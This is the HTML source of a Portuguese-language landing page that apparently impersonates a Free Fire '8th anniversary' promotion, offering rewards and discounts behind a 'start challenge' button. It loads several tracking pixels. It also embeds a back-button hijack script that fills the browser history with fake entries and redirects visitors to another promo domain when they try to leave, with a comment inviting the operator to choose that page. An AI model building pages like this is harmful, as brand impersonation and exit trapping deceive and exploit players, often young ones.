<!DOCTYPE html><html lang="en"><head><meta charset="utf-8">

<script>
  window.pixelId = "688b74f693a74883ef7682c1";
  var a = document.createElement("script");
  a.setAttribute("async", "");
  a.setAttribute("defer", "");
  a.setAttribute("src", "https://cdn.utmify.com.br/scripts/pixel/pixel.js");
  document.head.appendChild(a);
</script>
<script src="js/latest.js" data-utmify-prevent-xcod-sck="" data-utmify-prevent-subids="" async="" defer=""></script>

<script>
  window.pixelId = "688b7624fda3f99d4c9c31d0";
  var a = document.createElement("script");
  a.setAttribute("async", "");
  a.setAttribute("defer", "");
  a.setAttribute("src", "https://cdn.utmify.com.br/scripts/pixel/pixel.js");
  document.head.appendChild(a);
</script>
<script src="js/latest.js" data-utmify-prevent-xcod-sck="" data-utmify-prevent-subids="" async="" defer=""></script>

<meta name="viewport" content="width=device-width, initial-scale=1"><link rel="preload" href="/_next/static/media/028c0d39d2e8f589-s.p.woff2" as="font" crossorigin="" type="font/woff2"><link rel="preload" href="/_next/static/media/5b01f339abf2f1a5.p.woff2" as="font" crossorigin="" type="font/woff2"><link rel="preload" as="image" href="https://i.postimg.cc/7ZZsWLCZ/free-fire-logo-0.png"><link rel="stylesheet" href="css/bf3aeef7a311f2ac.css" data-precedence="next"><link rel="preload" as="script" fetchpriority="low" href="/_next/static/chunks/webpack-9712a3018cd6081c.js"><script src="js/4bd1b696-7a69eb9ed403e59d.js" async=""></script><script src="js/684-ab7e5ed626db7d4a.js" async=""></script><script src="js/main-app-c9779a9cf3f89b5e.js" async=""></script><script src="js/layout-bddc3b50e9c0bb2c.js" async=""></script><script src="js/253-d1a2e859ce733d03.js" async=""></script><script src="js/page-54e0a0aaefe2f145.js" async=""></script><link rel="preload" href="https://cdn.utmify.com.br/scripts/utms/latest.js" as="script"><meta name="next-size-adjust" content=""><title>Recarga Jogo</title><meta name="description" content="Created with v0"><meta name="generator" content="v0.dev"><style>
html {
  font-family: 'GeistSans', 'GeistSans Fallback';
  --font-sans: __variable_fb8f2c;
  --font-mono: __variable_f910ec;
}
        </style><script src="js/polyfills-42372ed130431b0a.js" nomodule=""></script></head><body><main class="min-h-screen"><div class="relative flex min-h-screen flex-col items-center justify-center overflow-hidden bg-white p-4 text-center"><div class="absolute inset-0 animate-gradient-move bg-gradient-to-br from-white via-gray-50 to-gray-100 opacity-70"></div><div class="relative z-10 flex flex-col items-center justify-center"><div class="mb-8" style="opacity:0;transform:translateY(-50px)"><img alt="Free Fire Official Logo" loading="eager" width="200" height="200" decoding="async" data-nimg="1" class="mx-auto mb-4 object-contain" style="color:transparent" src="images/free-fire-logo-0.png"><h1 class="text-4xl font-extrabold text-gray-900 md:text-5xl"><span class="text-red-600"></span> <span class="bg-gradient-to-r from-orange-500 to-yellow-500 bg-clip-text text-transparent">8º ANIVERSÁRIO</span> </h1><p class="mt-4 text-lg text-gray-700 md:text-xl">Participe do desafio oficial de aniversário e desbloqueie recompensas e descontos imperdíveis!</p></div><div style="opacity:0;transform:scale(0.8)"><button class="inline-flex items-center justify-center gap-2 whitespace-nowrap ring-offset-background focus-visible:outline-none focus-visible:ring-2 focus-visible:ring-ring focus-visible:ring-offset-2 disabled:pointer-events-none disabled:opacity-50 [&_svg]:pointer-events-none [&_svg]:size-4 [&_svg]:shrink-0 hover:bg-primary/90 h-10 relative overflow-hidden rounded-full bg-[#FFC107] px-12 py-6 text-xl font-bold uppercase text-white shadow-lg transition-all duration-300 hover:scale-105 hover:shadow-xl focus:outline-none focus:ring-4 focus:ring-[#FFC107] focus:ring-opacity-50 animate-pulse-dopamine"><span class="relative z-10">COMEÇAR DESAFIO</span><span class="absolute inset-0 block animate-shine bg-gradient-to-r from-transparent via-white to-transparent opacity-30"></span></button></div></div></div></main><script src="js/webpack-9712a3018cd6081c.js" async=""></script><script>(self.__next_f=self.__next_f||[]).push([0])</script><script>self.__next_f.push([1,"1:\"$Sreact.fragment\"\n2:I[7555,[],\"\"]\n3:I[1295,[],\"\"]\n4:I[9243,[\"177\",\"static/chunks/app/layout-bddc3b50e9c0bb2c.js\"],\"\"]\n5:I[894,[],\"ClientPageRoot\"]\n6:I[9640,[\"253\",\"static/chunks/253-d1a2e859ce733d03.js\",\"974\",\"static/chunks/app/page-54e0a0aaefe2f145.js\"],\"default\"]\n9:I[9665,[],\"OutletBoundary\"]\nc:I[9665,[],\"ViewportBoundary\"]\ne:I[9665,[],\"MetadataBoundary\"]\n10:I[6614,[],\"\"]\n:HL[\"/_next/static/media/028c0d39d2e8f589-s.p.woff2\",\"font\",{\"crossOrigin\":\"\",\"type\":\"font/woff2\"}]\n:HL[\"/_next/static/media/5b01f339abf2f1a5.p.woff2\",\"font\",{\"crossOrigin\":\"\",\"type\":\"font/woff2\"}]\n:HL[\"/_next/static/css/bf3aeef7a311f2ac.css\",\"style\"]\n"])</script><script>self.__next_f.push([1,"0:{\"P\":null,\"b\":\"uPkz2T4seJR9SGyQT0i1B\",\"p\":\"\",\"c\":[\"\",\"\"],\"i\":false,\"f\":[[[\"\",{\"children\":[\"__PAGE__\",{}]},\"$undefined\",\"$undefined\",true],[\"\",[\"$\",\"$1\",\"c\",{\"children\":[[[\"$\",\"link\",\"0\",{\"rel\":\"stylesheet\",\"href\":\"/_next/static/css/bf3aeef7a311f2ac.css\",\"precedence\":\"next\",\"crossOrigin\":\"$undefined\",\"nonce\":\"$undefined\"}]],[\"$\",\"html\",null,{\"lang\":\"en\",\"children\":[[\"$\",\"head\",null,{\"children\":[\"$\",\"style\",null,{\"children\":\"\\nhtml {\\n  font-family: 'GeistSans', 'GeistSans Fallback';\\n  --font-sans: __variable_fb8f2c;\\n  --font-mono: __variable_f910ec;\\n}\\n        \"}]}],[\"$\",\"body\",null,{\"children\":[[\"$\",\"$L2\",null,{\"parallelRouterKey\":\"children\",\"error\":\"$undefined\",\"errorStyles\":\"$undefined\",\"errorScripts\":\"$undefined\",\"template\":[\"$\",\"$L3\",null,{}],\"templateStyles\":\"$undefined\",\"templateScripts\":\"$undefined\",\"notFound\":[[[\"$\",\"title\",null,{\"children\":\"404: This page could not be found.\"}],[\"$\",\"div\",null,{\"style\":{\"fontFamily\":\"system-ui,\\\"Segoe UI\\\",Roboto,Helvetica,Arial,sans-serif,\\\"Apple Color Emoji\\\",\\\"Segoe UI Emoji\\\"\",\"height\":\"100vh\",\"textAlign\":\"center\",\"display\":\"flex\",\"flexDirection\":\"column\",\"alignItems\":\"center\",\"justifyContent\":\"center\"},\"children\":[\"$\",\"div\",null,{\"children\":[[\"$\",\"style\",null,{\"dangerouslySetInnerHTML\":{\"__html\":\"body{color:#000;background:#fff;margin:0}.next-error-h1{border-right:1px solid rgba(0,0,0,.3)}@media (prefers-color-scheme:dark){body{color:#fff;background:#000}.next-error-h1{border-right:1px solid rgba(255,255,255,.3)}}\"}}],[\"$\",\"h1\",null,{\"className\":\"next-error-h1\",\"style\":{\"display\":\"inline-block\",\"margin\":\"0 20px 0 0\",\"padding\":\"0 23px 0 0\",\"fontSize\":24,\"fontWeight\":500,\"verticalAlign\":\"top\",\"lineHeight\":\"49px\"},\"children\":404}],[\"$\",\"div\",null,{\"style\":{\"display\":\"inline-block\"},\"children\":[\"$\",\"h2\",null,{\"style\":{\"fontSize\":14,\"fontWeight\":400,\"lineHeight\":\"49px\",\"margin\":0},\"children\":\"This page could not be found.\"}]}]]}]}]],[]],\"forbidden\":\"$undefined\",\"unauthorized\":\"$undefined\"}],[\"$\",\"$L4\",null,{\"src\":\"https://cdn.utmify.com.br/scripts/utms/latest.js\",\"data-utmify-prevent-xcod-sck\":true,\"data-utmify-prevent-subids\":true,\"strategy\":\"afterInteractive\"}],[\"$\",\"$L4\",null,{\"id\":\"utmify-pixel-loader\",\"strategy\":\"afterInteractive\",\"children\":\"\\n            window.pixelId = \\\"687b19c4725acdbe2d4a458a\\\";\\n            var a = document.createElement(\\\"script\\\");\\n            a.setAttribute(\\\"async\\\", \\\"\\\");\\n            a.setAttribute(\\\"defer\\\", \\\"\\\");\\n            a.setAttribute(\\\"src\\\", \\\"https://cdn.utmify.com.br/scripts/pixel/pixel.js\\\");\\n            document.head.appendChild(a);\\n          \"}],[\"$\",\"$L4\",null,{\"id\":\"utmify-cid-checker\",\"strategy\":\"afterInteractive\",\"children\":\"\\n            (function esperarUTMify() {\\n              const check = () =\u003e {\\n                try {\\n                  if (window.__utmify \u0026\u0026 window.__utmify.cid) {\\n                    localStorage.setItem(\\\"utmify_cid\\\", window.__utmify.cid);\\n                    console.log(\\\"✅ CID salvo:\\\", window.__utmify.cid);\\n                    return true;\\n                  }\\n                } catch (e) {}\\n                return false;\\n              };\\n              let tentativas = 0;\\n              const intervalo = setInterval(() =\u003e {\\n                tentativas++;\\n                if (check() || tentativas \u003e= 20) clearInterval(intervalo);\\n              }, 300);\\n            })();\\n          \"}],[\"$\",\"$L4\",null,{\"id\":\"back-redirect\",\"strategy\":\"afterInteractive\",\"children\":\"\\n            // ALTERE O LINK PARA A PÁGINA QUE QUISER MOSTRAR QUANDO O USUÁRIO TENTAR SAIR\\n            const link = 'https://freefire-promo.vercel.app/';\\n            function setBackRedirect(url) {\\n              let urlBackRedirect = url;\\n              urlBackRedirect = urlBackRedirect =\\n                urlBackRedirect.trim() +\\n                (urlBackRedirect.indexOf('?') \u003e 0 ? '\u0026' : '?') +\\n                document.location.search.replace('?', '').toString();\\n              history.pushState({}, '', location.href);\\n              history.pushState({}, '', location.href);\\n              history.pushState({}, '', location.href);\\n              window.addEventListener('popstate', () =\u003e {\\n                console.log('onpopstate', urlBackRedirect);\\n                setTimeout(() =\u003e {\\n                  location.href = urlBackRedirect;\\n                }, 1);\\n              });\\n            }\\n            setBackRedirect(link);\\n          \"}]]}]]}]]}],{\"children\":[\"__PAGE__\",[\"$\",\"$1\",\"c\",{\"children\":[[\"$\",\"$L5\",null,{\"Component\":\"$6\",\"searchParams\":{},\"params\":{},\"promises\":[\"$@7\",\"$@8\"]}],\"$undefined\",null,[\"$\",\"$L9\",null,{\"children\":[\"$La\",\"$Lb\",null]}]]}],{},null,false]},null,false],[\"$\",\"$1\",\"h\",{\"children\":[null,[\"$\",\"$1\",\"i7WYHmfRIRmvnAihMpvfv\",{\"children\":[[\"$\",\"$Lc\",null,{\"children\":\"$Ld\"}],[\"$\",\"meta\",null,{\"name\":\"next-size-adjust\",\"content\":\"\"}]]}],[\"$\",\"$Le\",null,{\"children\":\"$Lf\"}]]}],false]],\"m\":\"$undefined\",\"G\":[\"$10\",\"$undefined\"],\"s\":false,\"S\":true}\n"])</script><script>self.__next_f.push([1,"7:{}\n8:{}\n"])</script><script>self.__next_f.push([1,"d:[[\"$\",\"meta\",\"0\",{\"charSet\":\"utf-8\"}],[\"$\",\"meta\",\"1\",{\"name\":\"viewport\",\"content\":\"width=device-width, initial-scale=1\"}]]\na:null\n"])</script><script>self.__next_f.push([1,"b:null\nf:[[\"$\",\"title\",\"0\",{\"children\":\"Recarga Jogo\"}],[\"$\",\"meta\",\"1\",{\"name\":\"description\",\"content\":\"Created with v0\"}],[\"$\",\"meta\",\"2\",{\"name\":\"generator\",\"content\":\"v0.dev\"}]]\n"])</script></body></html>